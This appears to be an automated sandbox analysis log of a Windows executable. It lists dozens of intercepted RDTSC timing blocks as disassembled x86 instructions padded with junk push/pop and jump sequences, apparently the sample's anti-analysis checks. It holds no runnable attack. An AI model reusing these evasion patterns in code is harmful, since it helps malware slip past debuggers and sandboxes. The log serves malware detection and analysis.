                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA27E6 second address: FA2806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA233D second address: FA2360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF340810308h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA2360 second address: FA236E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007FF34080AB06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA682B second address: FA684A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA684A second address: FA6850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA6850 second address: FA6884 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 jmp 00007FF340810309h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FF3408102FEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F08384 second address: F0838C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA5F99 second address: FA5F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA6108 second address: FA615B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB1Dh 0x0000000a jmp 00007FF34080AB17h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007FF34080AB06h 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF34080AB13h 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA62BC second address: FA62C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FA62C0 second address: FA62DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Bh 0x00000007 jng 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jl 00007FF34080AB0Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FABC65 second address: FABC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FABC6B second address: FABC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FABC6F second address: FABC91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 jmp 00007FF340810308h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FABC91 second address: FABC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FABC9C second address: FABD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3408102F6h 0x0000000a jmp 00007FF3408102FAh 0x0000000f popad 0x00000010 jnc 00007FF34081030Fh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jp 00007FF3408102F6h 0x00000021 jmp 00007FF340810309h 0x00000026 jmp 00007FF3408102FEh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FABECD second address: FABED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC04A second address: FAC04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC04F second address: FAC057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC2DC second address: FAC2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC2E0 second address: FAC2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC2E4 second address: FAC2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC2EF second address: FAC2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FAC5AB second address: FAC5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB1243 second address: FB124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB06h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB124D second address: FB125D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF3408102F6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB06B1 second address: FB06BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB06BA second address: FB06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB06C0 second address: FB06C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB07E4 second address: FB07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB07E8 second address: FB080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB18h 0x00000007 jl 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB080F second address: FB0849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810306h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF340810300h 0x00000012 pop eax 0x00000013 popad 0x00000014 js 00007FF340810318h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB09BE second address: FB09CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB0B1A second address: FB0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB97B6 second address: FB97D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b jc 00007FF34080AB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB776E second address: FB7779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF3408102F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB7779 second address: FB77B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF34080AB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FF34080AB35h 0x00000015 jnc 00007FF34080AB0Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF34080AB11h 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB78D7 second address: FB78E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB78E8 second address: FB78EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB7A65 second address: FB7A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FF3408102FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810304h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB7A90 second address: FB7A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB7A94 second address: FB7AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007FF3408102FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB7DBC second address: FB7DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB7DD4 second address: FB7DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB86D5 second address: FB86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB8A06 second address: FB8A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB8A0C second address: FB8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF34080AB08h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB8A1C second address: FB8A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF340810301h 0x0000000c jmp 00007FF3408102FFh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB91E6 second address: FB91EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB91EC second address: FB91F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB91F2 second address: FB9205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF34080AB0Dh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB9205 second address: FB9215 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB94E9 second address: FB9505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF34080AB14h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB9505 second address: FB9512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FB9512 second address: FB952B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB14h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC2534 second address: FC255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF340810304h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007FF3408102F6h 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F1411E second address: F14124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC173A second address: FC173E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC173E second address: FC1749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC1BCF second address: FC1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC1BDE second address: FC1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC1EF4 second address: FC1F13 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3408102FBh 0x0000000f jnp 00007FF3408102F6h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC20B9 second address: FC20BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC20BD second address: FC20C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC20C1 second address: FC20EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF34080AB06h 0x00000016 jmp 00007FF34080AB18h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC20EF second address: FC20F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC868E second address: FC8692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC8C77 second address: FC8C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF3408102FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC8DD0 second address: FC8DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC8DD4 second address: FC8DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC90B3 second address: FC90B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC9BF0 second address: FC9BFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC9BFA second address: FC9C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF34080AB0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FC9C0C second address: FC9C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FD15C8 second address: FD15D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FD15D3 second address: FD15DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF3408102F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FD173A second address: FD1744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FD1744 second address: FD1748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FD1748 second address: FD1754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FDD911 second address: FDD915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FDDA7D second address: FDDA9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Dh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FDDA9F second address: FDDAAB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FDDAAB second address: FDDAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF34080AB06h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF9FEB second address: FFA006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF340810303h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FFA006 second address: FFA019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jng 00007FF34080AB06h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FFA019 second address: FFA03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810301h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF8C6C second address: FF8C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF8DB0 second address: FF8DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF8DB6 second address: FF8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF8DBA second address: FF8DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF9249 second address: FF9286 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FF34080AB0Eh 0x0000000f jmp 00007FF34080AB15h 0x00000014 popad 0x00000015 push edx 0x00000016 jmp 00007FF34080AB0Bh 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF93AC second address: FF93D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007FF3408102FCh 0x00000012 jno 00007FF3408102FAh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: FF93D3 second address: FF93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
